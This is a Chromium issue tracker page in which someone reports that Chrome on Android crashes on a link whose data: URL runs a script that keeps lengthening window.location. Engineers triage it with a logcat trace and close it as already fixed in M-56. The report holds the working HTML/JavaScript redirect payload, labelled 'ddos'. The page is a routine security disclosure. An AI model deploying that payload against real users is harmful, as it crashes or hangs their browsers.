New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 678950 link

Starred by 2 users

Issue metadata

Status: WontFix
Owner:
Left Chrome team
Closed: Jan 2017
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Android
Pri: 2
Type: Bug-Security



Sign in to add a comment

Security: Infinite redirects with long URL can cause browser crash

Reported by pig.wi...@gmail.com, Jan 6 2017

Issue description


VULNERABILITY DETAILS
Chrome browser crash in android platform through  ---> 

<html>
<a href="data:text/html;charset=utf-8,<script>window.location+='?'+window.location.toString().split('');</script>">ddos</a>
</html>

similar to report -----> https://bugs.chromium.org/p/chromium/issues/detail?id=33952

VERSION
Chrome Version: [55.0.2883.91] + [stable]
Operating System: [android 5.1.1]

REPRODUCTION CASE

Go to www.tiks.host-ed.me then click on spoof.html then click on the link(ddos) and browser crashes.

Type of crash: [browser]
Crash State: "Unfortunately,Chrome has stopped"

 
Cc: yfried...@chromium.org
Components: UI>Browser>Navigation
Labels: Security_Severity-Low M-57 Security_Impact-Stable OS-Android
Owner: mariakho...@chromium.org
Status: Assigned (was: Unconfirmed)
I don't get a browser crash on 57.0.2954.0 with an internal-master Android build, but I do get an exception:

01-09 16:35:57.206 26487 26487 E cr_IntentUtils: java.lang.RuntimeException: android.os.TransactionTooLargeException: data parcel size 4102536 bytes
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.app.ApplicationPackageManager.queryIntentActivitiesAsUser(ApplicationPackageManager.java:835)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.app.ApplicationPackageManager.queryIntentActivities(ApplicationPackageManager.java:817)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.chrome.browser.externalnav.ExternalNavigationDelegateImpl.queryIntentActivities(ExternalNavigationDelegateImpl.java:231)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.chrome.browser.externalnav.ExternalNavigationHandler.shouldOverrideUrlLoadingInternal$5166USJ75THMGSJFDLKNAR9FCDK74RRDCKNM4SJFETPMASHFCLS78PBIDPGMORJ1EONKAU3KCLP6SOBC9PGNCQB7C5Q6IRREA1GN4OBDECTKOOBECHP6UQB45THMURJKCLN78BQ9DPQ6ARJK7DD4OQJ1EPGIUR31DPJIUKRKE9KMSPPR5566USJ75THMGSJFDLKNAR9FCDK74RRDCKNM4SJFETPMASHFCLS78PBIDPGMORJ1EONKAU3KCLP6SOBC9PGNCQB7C5Q6IRRE91GMSP3CCLP28JRMCLP74QB4CLAN4R2CDTGM8QBECT96ASRLDHQ3M___(ExternalNavigationHandler.java:323)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.chrome.browser.externalnav.ExternalNavigationHandler.shouldOverrideUrlLoading$5166USJ75THMGSJFDLKNAR9FCDK74RRDCKNM4SJFETPMASHFCLS78PBIDPGMORJ1EONKAU3KCLP6SOBC9PGNCQB7C5Q6IRREA1GN4OBDECTIIJ3FE9JIUOR8E9NMQQBLDKNM6Q3IDTMMABR2E9NNESR5E8NMAU3KCLP6SOBCDPGNCBQ5F1Q6ASJEC5M4SOBMD5JM2T39DTN4GOBECHM6ASH49TR6ASJID5I6ALBIDH66UOB4D5N6EKJ5EDQMOT1R(ExternalNavigationHandler.java:121)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.chrome.browser.tab.InterceptNavigationDelegateImpl.shouldIgnoreNavigation(InterceptNavigationDelegateImpl.java:112)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.base.SystemMessageHandler.nativeDoRunLoopOnce(Native Method)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.base.SystemMessageHandler.handleMessage(SystemMessageHandler.java:41)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.os.Handler.dispatchMessage(Handler.java:102)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.os.Looper.loop(Looper.java:154)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.app.ActivityThread.main(ActivityThread.java:6232)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at java.lang.reflect.Method.invoke(Native Method)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at com.android.internal.os.Zygote$MethodAndArgsCaller.run(Zygote.java:223)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:733)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils: Caused by: android.os.TransactionTooLargeException: data parcel size 4102536 bytes
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.os.BinderProxy.transactNative(Native Method)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.os.BinderProxy.transact(Binder.java:692)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.content.pm.IPackageManager$Stub$Proxy.queryIntentActivities(IPackageManager.java:3306)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.app.ApplicationPackageManager.queryIntentActivitiesAsUser(ApplicationPackageManager.java:827)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        ... 13 more

Comment 2 by pig.wi...@gmail.com, Jan 10 2017

yes i can confirm exception occurring in 57.0.2954.0 
Project Member

Comment 3 by sheriffbot@chromium.org, Jan 10 2017

Labels: Pri-2

Comment 4 by pig.wi...@gmail.com, Jan 13 2017

any updates?
Cc: tedc...@chromium.org
Status: WontFix (was: Assigned)
This is already fixed in M-56 (going stable at the end of January) by Ted. The exception in logcat is just a printed FYI -- we are unable to call system APIs with such a long URL. The exception is caught and handled.
Project Member

Comment 6 by sheriffbot@chromium.org, Apr 28 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment